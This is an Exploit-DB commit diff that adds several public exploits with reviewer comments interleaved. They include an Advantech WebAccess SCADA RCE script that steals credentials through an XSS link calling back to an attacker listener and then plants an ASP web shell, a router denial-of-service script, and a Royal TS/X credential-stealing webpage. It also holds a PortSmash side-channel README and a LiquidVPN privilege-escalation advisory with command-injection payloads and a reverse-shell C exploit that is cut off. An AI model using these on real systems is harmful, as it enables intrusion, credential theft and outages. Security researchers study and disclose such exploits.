DB: 2018-11-06

13 changes to exploits/shellcodes

Softros LAN Messenger 9.2 - Denial of Service (PoC)
Microsoft Internet Explorer 11 - Null Pointer Dereference
LiquidVPN 1.36 / 1.37 - Privilege Escalation
Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel
SiAdmin 1.1 - 'id' SQL Injection
Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
WebVet 0.1a - 'id' SQL Injection
Virgin Media Hub 3.0 Router - Denial of Service (PoC)
Poppy Web Interface Generator 0.8 - Arbitrary File Upload
Mongo Web Admin 6.0 - Information Disclosure
PHP Proxy 3.0.3 - Local File Inclusion
Royal TS/X - Information Disclosure
Voovi Social Networking Script 1.0 - 'user' SQL Injection
This commit is contained in:
Offensive Security 2018-11-06 05:01:40 +00:00
parent 0f49f84ff4
commit 363500a603
14 changed files with 1579 additions and 0 deletions

303
exploits/asp/webapps/45774.py Executable file

@ -0,0 +1,303 @@
# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
# Date: 2018-11-02
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: http://www.advantech.com
# Device: NRVMini2
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH
# Version: 8.3.2
# Tested on: Windows Server 2008 R2
# CVE: CVE-2018-15705, CVE-2018-15707
# TRA: https://www.tenable.com/security/research/tra-2018-35
# Description:
#
# This code exploits two vulnerabilities to gain remote code execution
# with Administrator privileges:
#
# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required.
# 2) CVE-2018-15705 to write an ASP file to the server.
from http.server import HTTPServer, BaseHTTPRequestHandler
from base64 import decodestring
import re
import requests, urllib, json
import sys
import argparse
TIMEOUT = 5 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# WADashboard client
class WsClient:
def __init__(self, ip, port, https=False):
self.ip = ip
self.port = port
self.https = https
self.endpoint = 'https' if https else 'http'
self.endpoint += '://' + ip + ':' + str(port)
self.endpoint += '/WADashboard'
# see if service is up
def grab_projects(self):
url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList'
r = requests.get(url, timeout=TIMEOUT)
if "resString" in r.text:
json_decoded = json.loads(r.text)
if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0:
return json_decoded['resString']
return None
# success if we get cookies
def login(self, projectName, user, pw):
# issue a login request and set the cookies
# POST /WADashboard/login?cont=dashboardViewer
# projectName1=myproject&username=admin&password=hello&recId=
url = self.endpoint + '/login?cont=dashboardViewer'
data = {
'projectName1' : projectName,
'username' : user,
'password' : pw,
'recId' : ''
}
r = requests.post(url, data, timeout=TIMEOUT)
if len(r.cookies) > 0:
self.cookies = r.cookies
return True # success
else:
return False # fail
def write_file(self, filename, contents):
# /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true
# post the writeFile request
# for some reason, the data is required in the query string instead of POST data
url = self.endpoint + '/api/dashboard/v1/files/writeFile'
data = {
'projectSpecies' : victim['project'] + '!savedConfiguration',
'folderpath' : '../../../../' + filename, # uploads to /Broadweb/ folder
'msg' : contents,
'overwrite' : 'true'
}
url += '?' + urllib.urlencode(data)
r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT)
return (r.status_code == 200)
# This class will serve as an HTTP listener
class MyWebHandler(BaseHTTPRequestHandler):
def do_GET(self):
data = self.path.replace('/', '') # remove leading slash
decoded = decodestring(data)
print "\n***LINK CLICKED!***"
try:
# carve out the piece we want to match
i = decoded.index('logOnWebService')
k = decoded.index('readNodeStatus')
chunk = decoded[i:k]
# find our match
regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*'
m = re.match(regex, chunk)
if not m:
err_and_exit("Couldn't extract credentials...")
print "\nCredentials stolen..."
user = m.group(1)
pw = m.group(2)
print "- User: " + user
print "- Pass: " + pw
# login to WADashboard
if not client.login(victim['project'], user, pw):
err_and_exit("Credentials didn't work...")
print '\nLogged into WADashboard with credentials.'
# write malicious ASP file
asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>'
filename = 'exec.asp'
if not client.write_file(filename, asp_payload):
err_and_exit("Write file failed...")
print "\n'" + filename + "' written to disk."
# execute OS command
url = broadweb_root + '/' + filename
data = {
'p' : victim['project'],
'n' : victim['node'],
'c' : victim['cmd']
}
url += '?' + urllib.urlencode(data)
r = requests.get(url, timeout=TIMEOUT) # no cookie needed
if r.status_code == 200:
print "\nSuccessful request to '" + url + "'\n"
else:
print "\nThere may be something wrong with the ASP payload.\n"
print "\nDone!"
except Exception as e:
print "Exception encountered: " + str(e)
msg = 'hello poppet'
self.send_response(200)
self.end_headers()
self.wfile.write(str.encode(msg))
# MAIN
# deal with command line flags
desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64.
The goal of the script is to execute code remotely. User interaction is required.
The following operations will be conducted:
1) Ensure WebAccess application is running. (TCP port 80 by default)
2) Ensure WADashboard is running. (TCP port 8081 by default)
3) Ensure user-specified project exists.
4) Ensure user-specified node exists.
5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS)
6) Start HTTP listener to receive credentials when victim clicks the link.
7) Login to WADashboard.
8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705)
Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function.
9) Execute user-specified command.
Example (equivalent) commands:
python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe
python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe
'''
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)')
arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)')
arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)')
arg_parser.add_argument('-proj', required=True, help='Project name')
arg_parser.add_argument('-node', required=True, help='Node name')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-cmd', required=True, help='OS command to be executed')
args = arg_parser.parse_args()
# victim settings
victim = dict()
victim['ip'] = args.t
victim['web_port'] = args.p1 # Broadweb web app port
victim['ws_port'] = args.p2 # WADashboard Node.js service port
victim['https'] = args.https
victim['project'] = args.proj
victim['node'] = args.node
victim['cmd'] = args.cmd
# listener settings
listener = dict()
listener['ip'] = args.ip
listener['port'] = args.port
# validate IP addresses
ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
for ip in [victim['ip'], listener['ip']]:
match = re.match(ip_pattern, ip)
if match is None:
print "\nError: IP Address is invalid: '" + ip + "'.\n"
arg_parser.print_help()
sys.exit(1)
# start the real work
# ensure WebAccess ASP application is running
print "\nPerforming some banner checks to ensure services are running...\n"
proto = 'https' if victim['https'] else 'http'
broadweb_root = proto + '://' + victim['ip']
# no need to add port if it's 80 or 443
https = victim['https']
if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https):
broadweb_root += ':' + str(victim['web_port'])
broadweb_root += '/broadWeb'
url = broadweb_root + '/bwRoot.asp'
try:
r = requests.get(url, timeout=TIMEOUT)
except requests.exceptions.ConnectionError as e:
err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port']))
if 'Welcome to Advantech WebAccess' not in r.text:
err_and_exit('WebAccess not found.')
print 'WebAccess is up.'
# ensure WADashboard Node.js service is running
# and projects are defined
client = WsClient(victim['ip'], victim['ws_port'], https=https)
try:
projects = client.grab_projects()
except requests.exceptions.ConnectionError as e:
err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port']))
if not projects:
err_and_exit('Dashboard Viewer not found.')
print "Dashboard Viewer is up."
if len(projects) == 0:
err_and_exit("No projects found...")
print "\nFound projects: "
for project in projects:
print " - " + project
# ensure specified project exists
if victim['project'] not in projects:
err_and_exit("Specified project, " + victim['project'] + " was not found...")
print "Specified project '" + victim['project'] + "' exists."
# ensure nodes are defined for project
# we have to specify a node name to run the custom RemoteWinExec() function
url = broadweb_root + '/' + victim['project'] +'.dpj'
r = requests.get(url, timeout=TIMEOUT)
node_list = list()
if "[nodelist]" in r.text:
for line in r.text.split('\n'):
regex = "^node[0-9]=(.*)$"
m = re.match(regex, line, flags=re.MULTILINE)
if m:
node_list.append(m.group(1).strip())
if len(node_list) == 0:
err_and_exit("No nodes found...")
print "\nFound nodes: "
for node in node_list:
print ' - ' + node
if victim['node'] not in node_list:
err_and_exit("Node, " + victim['node'] + " not in node list...")
print "Specified node '" + victim['node'] + "' exists."
# generate link to send to victim
print "\nSend this link to the victim:"
print "Keep in mind, they could be logged in via localhost."
link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');'
link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/'
link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//'
print link
# start listener
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
print "Waiting for victim to click link..."
httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler)
httpd.handle_request()
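Review bot: The script mixes Python 2 and Python 3: the `print 'x'` statements and `urllib.urlencode` are Python 2 only, while `from http.server import HTTPServer, BaseHTTPRequestHandler` exists only in Python 3 (Python 2 spells it `from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler`), so the file as committed does not run unmodified under either interpreter; the header should state the intended interpreter and the imports should match it. `arg_parser.add_argument('-https', type=bool, default=False, ...)` is also wrong, because argparse hands the raw string to `bool()` and `-https false` therefore evaluates to True, contradicting the example in `desc`; `choices=('true', 'false')` with `victim['https'] = args.https == 'true'` keeps the documented syntax and fixes the value. Smaller points: `WsClient.write_file` reads the module global `victim['project']` instead of taking it as a parameter or using an attribute set in `__init__`, and `base64.decodestring` is deprecated in favour of `decodebytes`.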


@ -0,0 +1,122 @@
# Summary
This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.
![Alt text](parse_raw_simple.png?raw=true "Title")
# Setup
## Prerequisites
A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.
This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed.
## OpenSSL
Download and install OpenSSL 1.1.0h or lower:
cd /usr/local/src
wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
tar xzf openssl-1.1.0h.tar.gz
cd openssl-1.1.0h/
export OPENSSL_ROOT_DIR=/usr/local/ssl
./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
make -j8
make test
sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw
If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`.
# Tooling
## freq.sh
Turns off frequency scaling and TurboBoost.
## sync.sh
Sync trace through pipes. It has two victims, one of which should be active at a time:
1. The stock `openssl` running `dgst` command to produce a P-384 signature.
2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.)
The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist.
The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with
openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin
In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created.
For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with
$ grep '^core id' /proc/cpuinfo
core id : 0
core id : 1
core id : 2
core id : 3
core id : 0
core id : 1
core id : 2
core id : 3
So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (`core_id`).
## spy
Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time.
Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary.
## ecc
Victim harness for running OpenSSL scalar multiplication with known inputs. Example:
./ecc M 4 deadbeef0123456789abcdef00000000c0ff33
Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar.
## parse_raw_simple.py
Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.
You might have to adjust the `CEIL` variable if the plots are too aggressively clipped.
Python packages:
sudo apt-get install python-numpy python-matplotlib
# Usage
Turn off frequency scaling:
./freq.sh
Make sure everything builds:
make clean
make
Take a measurement:
./sync.sh
View the trace:
python parse_raw_simple.py timings.bin
You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`.
# Credits
* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
* Billy Bob Brumley (Tampere University of Technology, Tampere, Finland)
* Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland)
* Cesar Pereida García (Tampere University of Technology, Tampere, Finland)
* Nicola Tuveri (Tampere University of Technology, Tampere, Finland)
EDB Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45785.zip


@ -0,0 +1,101 @@
# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ross Inman
# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers
# Software Link: N/A
# Version: Virgin Media Hub 3.0
# Tested on: Linux
# CVE : N/A
#!/usr/bin/python2.7
import socket, sys, random, os
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
def connection(ip,port):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(1)
test = s.connect_ex((ip,port))
s.close()
if(test == 0):
return True
else:
return False
def dos(ip,port):
socks = []
payload = """
POST / HTTP/1.1\
Host: {}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: {}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
""".format(ip,random.choice(user_agents))
with open("/tmp/payload.txt","w") as f:
f.write(payload)
f.close()
with open("/tmp/payload.txt","r") as f:
lines = f.readlines()
f.close()
os.remove("/tmp/payload.txt")
while(True):
try:
sys.stdout.write("\r[Info]Sending packets => {}".format(ip))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))
for line in lines:
s.send(line)
socks.append(s)
except KeyboardInterrupt:
print"\n[Info]Closing connections..."
for sock in socks:
sock.close()
socks.remove(sock)
sys.exit(0)
def main():
if(len(sys.argv) != 3):
sys.exit("Usage: ./dos.py {target ip} {port}")
else:
target = sys.argv[1]
port = int(sys.argv[2])
print"[Info]Checking connection to target..."
check = connection(target,port)
if(not check):
sys.exit("[Failure]Connection to target failed.")
print"[Info]Starting attack on: {}".format(target)
dos(target,port)
if(__name__ == "__main__"):
main()
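Review bot: `dos()` writes the request to a fixed path `/tmp/payload.txt` and reads it straight back only to split it into lines; a predictable filename in a world-writable directory is a symlink/clobber hazard on the host running the script, and the round-trip buys nothing since `lines = payload.splitlines(True)` yields the same list in memory (the explicit `f.close()` calls inside each `with` block are also redundant). The `KeyboardInterrupt` cleanup mutates `socks` while iterating it (`socks.remove(sock)` inside `for sock in socks`), which skips every other element and leaves those sockets open; `while socks: socks.pop().close()` closes them all. The `user_agents` list is missing a comma after the `Edge/14.14393"` entry, so adjacent-literal concatenation silently merges two strings into one element. `connection()` can simply `return test == 0`.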


@ -0,0 +1,126 @@
<!--
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865
Affected product:
=============
Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta
Vulnerability - Information Disclosure:
=============================
Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.
PoC website:
==========
-->
<!DOCTYPE html>
<meta charset="utf-8" />
<title>RoyalTS/X Exploit</title>
<script language="javascript" type="text/javascript">
var wsUri = "ws://127.0.0.1:54890/";
var output;
function init()
{
output = document.getElementById("output");
testWebSocket();
}
function testWebSocket()
{
writeToScreen("Let's retrieve some data...");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
function onOpen(evt,message)
{
doSend(message);
}
function onClose(evt)
{
}
function onMessage(evt)
{
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
}
function onError(evt)
{
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}
function doSend(message)
{
websocket.send(message);
}
function writeToScreen(message)
{
var pre = document.createElement("p");
pre.style.wordWrap = "break-word";
pre.innerHTML = message;
output.appendChild(pre);
}
window.addEventListener("load", init, false);
</script>
<h2>RoyalTS/X Exploit</h2>
<div id="output"></div>
<!--
Contact:
=======
Jakub[dot]Palaczynski[at]gmail[dot]com
-->
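Review bot: `writeToScreen` assigns server-supplied strings to `pre.innerHTML`, so any document name, user name or URL returned by the local service is rendered as markup and can run script inside this page; use `pre.textContent = message;` for the data lines and build the one styled ERROR span with `createElement` instead. `websocket` is never declared and becomes an implicit global, and `onMessage` re-declares `var obj` in the `GetLoginInformation` branch by parsing the same `evt.data` a second time, which is redundant and shadows the outer variable. Since the advisory's root cause is that the listener on port 54890 services commands from any origin, the product-side fix worth stating in the header comment is to validate the WebSocket `Origin` header and require an authenticated handshake before honouring `GetDocuments`/`GetLoginInformation`.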


@ -0,0 +1,312 @@
/*
=======================================================================
Title: Multiple Privilege Escalation Vulnerabilities
Product: LiquidVPN for MacOS
Vulnerable versions: 1.37, 1.36 and earlier
CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
Impact: Critical
Homepage: https://www.liquidvpn.com
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================
Vendor description:
-------------------
"LiquidVPN creates a secure encrypted link between your device and the
Internet.
When you connect to the Internet from your home, mobile device, office or a
WiFi
hotspot with encryption your traffic cant be monitored by 3rd parties like
your
ISP. Without encryption, your ISP can store information about the websites
you
use and sell that data to anyone willing to pay for it. Some ISPs even
inject
advertisements into web pages to further profit off of the Internet service
you
pay for."
Source: https://www.liquidvpn.com
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the LiquidVPN
client.
Users are urged to uninstall the application until the vendor ships a new
version
of the LiquidVPN client.
Vulnerability overview/description:
-----------------------------------
LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for
performing
privileged (root) actions. In order to allow other LiquidVPN components to
send
messages to the helper tool, it implements an XPC service. Static code
analysis
showed, that the XPC service does not filter incoming messages. This means,
regular users (local attackers) can craft arbitrary XPC messages and send
them
to the service. This leads to the following issues:
1) "anycmd" Privilege Escalation (reserved CVE-2018-18857)
After receiving a message, the service checks for the existence of the
"anycmd" parameter:
============================================================================================
...
__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd"
__text:00000001000012EF mov rdi, r14 ; char *
__text:00000001000012F2 call _strcmp
__text:00000001000012F7 test eax, eax
__text:00000001000012F9 jnz loc_1000016C2
__text:00000001000012FF mov [rbp+var_10A38], r15
__text:0000000100001306 lea rsi, aCommandLine ;
"command_line"
__text:000000010000130D mov rdi, rbx
...
__text:0000000100001336 lea rsi, aR ; "r"
__text:000000010000133D mov rdi, r14 ; char *
__text:0000000100001340 call _popen
...
============================================================================================
If "anycmd" is found, the "command_line" parameter is extracted from the
message
and directly passed on to a call to popen() as an argument.
2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856)
Similar to the previous vulnerability, the service checks if the "openvpn"
parameter exists. If it does, the "openvpncmd" parameter is extracted and
passed
on to a system() call as an argument:
============================================================================================
...
__text:00000001000013F1 lea rsi, aOpenvpncmd ;
"openvpncmd"
__text:00000001000013F8 mov rdi, rbx
__text:00000001000013FB call _xpc_dictionary_get_string
...
__text:000000010000166A mov rdi, r15 ; char *
__text:000000010000166D call _system
__text:0000000100001672 lea rsi, aReply ; "reply"
__text:0000000100001679 lea rdx, aOpenvpnCommand ;
"openvpn command executed (ver 3)"
__text:0000000100001680 mov rdi, r12
__text:0000000100001683 call _xpc_dictionary_set_string
...
============================================================================================
3) OS Command Injection (reserved CVE-2018-18858)
If the service detects the "openvpn" parameter in a message, it also checks
if
the parameters "tun_path" or "tap_path" exist. If one of them (or both)
are found,
the values are used as source paths for a copy process using the system()
function.
However, the paths are not sanitized before being passed to system():
============================================================================================
...
__text:00000001000013CD lea rsi, aPathTun ; "path_tun"
__text:00000001000013D4 mov rdi, rbx
__text:00000001000013D7 call _xpc_dictionary_get_string
__text:00000001000013DC mov r14, rax
__text:00000001000013DF lea rsi, aPathTap ; "path_tap"
__text:00000001000013E6 mov rdi, rbx
__text:00000001000013E9 call _xpc_dictionary_get_string
...
__text:000000010000143F call _strcat
__text:0000000100001444 mov rdi, rbx ; char *
__text:0000000100001447 call _strlen
...
__text:0000000100001497 mov rdi, rbx ; char *
__text:000000010000149A call _system
..
============================================================================================
4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859)
The previous vulnerability can also be used to directly install an arbitrary
kernel extension. When the client is installed, "tun_path" and "tap_path"
are
pointed to the application folder for installing
"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and
"/Applications/LiquidVPN.app/Contents/Resources/tap.kext".
By crafting an XPC message containing attacker controlled kernel extension
paths,
the helper tool installs the kernel extensions using a call to the system
function
kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In
adddition to that,
Apple introduced user-approval for installing third party kernel
extensions. However,
as an attacker has local access to the system and user-approval does not
require the
user to enter a root or admin password, this is not a problem.
Proof of concept:
-----------------
The following proof of concepts can be used to execute arbitrary system
commands:
1) "anycmd" Privilege Escalation
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
============================================================================================
2) "openvpncmd" Privilege Escalation
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]");
...
============================================================================================
3) OS Command Injection
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY
CMD]");
...
============================================================================================
4) Loading of arbitrary Kernel Extensions
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]");
...
============================================================================================
Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
1.37 (most recent) and 1.36.
Earlier versions might be vulnerable as well.
Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via twitter @LiquidVPN
2018-10-11: Contacted vendor through dave@liquidvpn.com
2018-10-11: Sent PGP encrypted advisory (
https://my.liquidvpn.com/canary/syswan)
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com
2018-10-30: Received vendor notification:
No patches will be issued as the LiquidVPN client for MacOS
will be
replaced by new app in the future
2018-10-31: Published to Full Disclosure Mailing List
Solution:
---------
None.
Workaround:
-----------
None.
EOF B. Leitner / @2018
*/
// start netcat listener on port 9999
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <xpc/xpc.h>
void what(const char *bin) {
printf("%s <1-4>\n", bin);
printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n");
printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n");
printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n");
printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n");
}
int main(int argc, const char *argv[]) {
if (argc == 1 || argc > 2) {
what(argv[0]);
return 0;
}
int option = atoi(argv[1]);
xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
switch(option) {
case 1:
// "anycmd"
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
